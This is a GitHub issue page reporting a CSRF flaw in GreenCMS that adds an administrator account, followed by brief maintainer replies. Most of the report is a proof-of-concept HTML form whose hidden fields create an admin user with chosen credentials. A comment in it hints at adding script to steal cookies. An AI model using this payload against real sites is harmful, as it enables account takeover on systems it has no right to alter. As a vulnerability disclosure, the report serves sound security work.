Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

GreenCMS存在CSRF漏洞可增加管理员账户 #109

anquanquantao opened this Issue Jun 1, 2018 · 2 comments


None yet
2 participants
Copy link

anquanquantao commented Jun 1, 2018


<span style="font-size:18px;"><!DOCTYPE html>  
<html lang="en">  
    <meta charset="UTF-8">  
        <form action="" method="POST" id="transfer" name="transfer">  
        <input type="hidden" name="user_id0" value="1">  
        <input type="hidden" name="user_login" value="test1">  <!--在这里可以添加JS脚本用于获取cookies  csrf+xss-->
        <input type="hidden" name="password" value="test1">  
        <input type="hidden" name="rpassword" value="test1">  
        <input type="hidden" name="user_nicename" value="123">  
        <input type="hidden" name="user_email" value="">  
        <input type="hidden" name="user_url" value="">  
        <input type="hidden" name="user_intro" value="test">  
        <input type="hidden" name="user_status" value="1">  
        <input type="hidden" name="role_id" value="1">
        <button type="submit" value="Submit">添加管理员</button>  

This comment has been minimized.

Copy link

TimothyZhang023 commented Jun 1, 2018

?m=admin&c=access&a=adduserhandle 这个权限 需要管理员才能设置才能执行。不然不会落库


This comment has been minimized.

Copy link

anquanquantao commented Jun 1, 2018


@TimothyZhang023 TimothyZhang023 added the bug label Jun 1, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.